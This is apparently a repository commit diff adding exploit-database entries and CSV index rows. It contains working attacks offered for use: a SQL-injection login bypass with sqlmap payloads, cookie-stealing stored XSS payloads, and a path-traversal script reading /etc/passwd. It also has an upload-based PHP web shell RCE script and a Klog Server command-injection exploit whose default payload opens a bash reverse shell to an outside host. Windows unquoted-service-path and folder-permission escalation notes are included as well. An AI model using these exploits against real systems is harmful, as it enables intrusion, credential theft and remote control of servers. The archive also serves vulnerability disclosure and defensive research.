&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes

11
exploits/php/webapps/49356.txt Normal file
View file

@ -0,0 +1,11 @@
# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url http://localhost/onlinemovie/user-login.php
Step 2 Enter Username :- anything@mail.com
Step 3 - Enter Password - ' or '1'='1'#

83
exploits/php/webapps/49357.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: Responsive E-Learning System 1.0 'id' Sql Injection
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql
Injection.
*Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17
-p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id
# sqlmap -u
http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id
___
__H__
___ ___["]_____ ___ ___
{1.3.11#stable}
|_ -| . [.] | .'| .
|
|___|_ [']_|_|_|__,|
_|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:59:01 /2020-12-24/
08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 402
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28
END))-- YDSn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm
---
[08:59:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12

13
exploits/php/webapps/49358.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Version: 1
# Tested on Windows
Vulnerable Parameters: Edit Page tab
Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
2: Add the new post and then add the payload "<audio src/onerror=alert(document.cookie)>" in "Post title" parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

64
exploits/php/webapps/49359.py Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
# Date: 12/12/2018 (PoC)
# Date: 04/01/2020 (Auto Exploit)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: intitle:"Responsive FileManager 9.x.x"
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4
# Version: < 9.13.4
# Tested on: Linux 64bit + Python3
#!/usr/bin/python3
# Usage: python exploit.py [URL] [SESSION] [File Path]
# python3 exploit.py http://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd
import requests
import sys
def usage():
if len(sys.argv) != 4:
print("Usage: python3 exploit.py [URL]")
sys.exit(0)
def copy_cut(url, session_cookie, file_name):
headers = {'Cookie': session_cookie,
'Content-Type': 'application/x-www-form-urlencoded'}
url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
r = requests.post(
url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers)
return r.status_code
def paste_clipboard(url, session_cookie):
headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
r = requests.post(
url_paste, data="path=", headers=headers)
return r.status_code
def read_file(url, file_name):
name_file = file_name.split('/')[-1]
url_path = "%s/source/%s" % (url,name_file) #This is the default directory,
#if the website is a little different, edit this place
result = requests.get(url_path)
return result.text
def main():
usage()
url = sys.argv[1]
session_cookie = sys.argv[2]
file_name = sys.argv[3]
print("[*] Copy Clipboard")
copy_result = copy_cut(url, session_cookie, file_name)
if copy_result==200:
paste_result = paste_clipboard(url, session_cookie)
else:
print("[-] Paste False")
if paste_result==200:
print("[*] Paste Clipboard")
print(read_file(url, file_name))
else:
print("[-] Copy False")
if __name__ == "__main__":
main()

32
exploits/php/webapps/49364.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9
1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>
2. Stored XSS
Use an editor account with rights to manage banners, plugins.
+ Banner Manager:
- Add or edit banner:
Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
+ Plugin Manager:
- Add or edit album(/admin/plugin/gallery):
Album Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
Short Description field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
- Add or edit Category(/admin/plugin/article/):
Category Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

32
exploits/php/webapps/49365.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Online Learning Management System 1.0 - RCE (Authenticated)
# Date: 01.01.2021
# Exploit Author: Bedri Sertkaya
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 / WAMP Server
import requests
cmd = "start cmd.exe" # Command to execute
target = "http://192.168.1.101/lms" #
username = "21100867"
password = "heni"
# Login and get session_cookie
url = target+"/login.php"
headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-A=gent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML=, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://192.168.1.10=1", "Referer": "http://192.168.1.101/lms/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
data = {"username": username, "password": password}
s = requests.post(url, headers=headers, data=data)
session_cookie = s.cookies.get_dict()
# Upload Shell
burp0_url = target+"/student_avatar.php"
burp0_cookies = session_cookie
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.101", "Content-Type": "multipart/form-data; boundary----WebKitFormBoundarybHBgGwgOFblz5IgL", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0=.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.101/lms/student_notification.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = "------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"image\"; filename=\"exploit.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nshell_exec('"+cmd+"');\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"change\"\r\n\r\n\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
# Trigger exploit
trigger_url = "http://192.168.1.101:80/lms/admin/uploads/exploit.php"
trigger_cookies = session_cookie
requests.get(trigger_url, cookies=trigger_cookies)

97
exploits/php/webapps/49366.py Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated)
# Date: 22.12.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.klogserver.com/
# Version: 2.4.1
# Tested On: Ubuntu 18.04
# CVE: 2020-35729
# Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER
"""
~ VULNERABILITY DETAILS ~
#
The Klog Server runs the injected os commands on the server , causing os command
injection vulnerability.
#
The following python code will inject os command payload and can be relaized reverse
shell connection.And you can be added payload except the default payload plugin.
##USAGE##
$sudo nc -nlvp 98
$sudo python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\""
##OUTPUT##
bash-4.2$whoami
apache
bash-4.2$
"""
import requests
import argparse
from colorama import Fore, Back, Style, init
def main():
desc = "KLOG SERVER 2.4.1 EXPLOIT"
parser = argparse.ArgumentParser(description=desc)
option = parser.add_argument_group('[*]OPTIONS[*]')
parser.add_argument("--url", help=Fore.GREEN+"[*]TARGET URL ADDRESS[*]", required=False)
parser.add_argument("--payload",help=Fore.GREEN+"[*] TO ADD PAYLOAD [*]", type=str,required=False)
parser.add_argument("--exploit", help=Fore.GREEN+" ", action="store_true")
args = parser.parse_args()
if args.exploit:
if args.url:
url = args.url
if args.payload:
payload = args.payload
target_send_config(url, payload)
#default bash reverse shell payload
else:
payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
target_send_config(url, payload)
else:
#default url (klog server init ip address)
url = "https://10.10.56.51:443/actions/authenticate.php"
if args.payload:
payload = args.payload
target_send_config(url, payload)
else:
payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
target_send_config(url, payload)
def target_send_config(url, payload):
headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"}
#injection place
data = {"user": payload,
"pswd": "test"}
try:
#post method send
requests.post(url, headers=headers, data=data, verify=False)
print(" ")
print(Fore.GREEN+" "+"[+] EXPLOIT SUCCESSFUL PAYLOAD IS SENT [+]")
except:
print(Fore.RED+"[-] EXPLOIT FAILED [-]")
if __name__ == '__main__':
main()

41
exploits/windows/local/49350.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 8.0.0.1039
# File Version: 8.0.0.1039
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname,
pathname, startmode, startname
DisplayName Name PathName
StartMode StartName
Intel(R) Matrix Storage Event Monitor IAANTMON C:\Program Files
(x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe Auto
LocalSystem
# 2. To check service info:
C:\>sc qc "IAANTMON"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: IAANTMON
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix
Storage Manager\IAANTMon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Matrix Storage Event Monitor
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
To exploit this vulnerability an attacker requires to drop a malicious
executable into the service path undetected by the OS in order
to gain SYSTEM privileges.

33
exploits/windows/local/49363.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
# Date: 21.12.2020
# Exploit Author: Adrian Bondocea
# Vendor Homepage: https://www.fluentd.org/
# Software Link: https://td-agent-package-browser.herokuapp.com/4/windows
# Version: <v4.0.1
# Tested on: Windows 10 x64
# CVE : CVE-2020-28169
# External URL: https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169
Description:
The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.
Vulnerable Path: ( Authenticated Users have permission to write within the location )
PS C:\opt\td-agent\bin> icacls C:\opt\td-agent\bin
C:\opt\td-agent\bin BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
Vulnerable service:
PS C:\opt\td-agent\bin> get-service fluentdwinsvc
Status Name DisplayName
------ ---- -----------
Running fluentdwinsvc Fluentd Windows Service
Service Path:
"C:/opt/td-agent/bin/ruby.exe" -C t"C:/opt/td-agent/lib/ruby/gems/2.7.0/gems/fluentd-1.11.2/lib/fluent/command/.."
winsvc.rb --service-name fluentdwinsvc

18
files_exploits.csv
View file

@ -11236,6 +11236,8 @@ id,file,description,date,author,type,platform,port
49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,
49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
49350,exploits/windows/local/49350.txt,"Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path",2021-01-05,"Geovanni Ruiz",local,windows,
49363,exploits/windows/local/49363.txt,"Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission",2021-01-05,"Adrian Bondocea",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43559,3 +43561,19 @@ id,file,description,date,author,type,platform,port
49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",2021-01-04,icekam,webapps,php,
49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",2021-01-04,"Shivam Verma",webapps,multiple,
49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",2021-01-04,LiquidWorm,webapps,windows,
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,
49352,exploits/php/webapps/49352.txt,"House Rental and Property Listing 1.0 - Multiple Stored XSS",2021-01-05,"Mohamed habib Smidi",webapps,php,
49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)",2021-01-05,"Kshitiz Raj",webapps,php,
49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
49356,exploits/php/webapps/49356.txt,"Online Movie Streaming 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,
49357,exploits/php/webapps/49357.txt,"Responsive ELearning System 1.0 - 'id' Sql Injection",2021-01-05,"Kshitiz Raj",webapps,php,
49358,exploits/php/webapps/49358.txt,"Baby Care System 1.0 - 'Post title' Stored XSS",2021-01-05,"Hardik Solanki",webapps,php,
49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,
49360,exploits/linux/webapps/49360.py,"Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)",2021-01-05,"Jeremy Brown",webapps,linux,
49361,exploits/multiple/webapps/49361.py,"HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities",2021-01-05,"Jeremy Brown",webapps,multiple,
49362,exploits/linux/webapps/49362.py,"Cassandra Web 0.5.0 - Remote File Read",2021-01-05,"Jeremy Brown",webapps,linux,
49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",2021-01-05,SunCSR,webapps,php,
49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",2021-01-05,"Bedri Sertkaya",webapps,php,
49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",2021-01-05,B3KC4T,webapps,php,
49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting",2021-01-05,"Mesut Cetin",webapps,multiple,

Can't render this file because it is too large.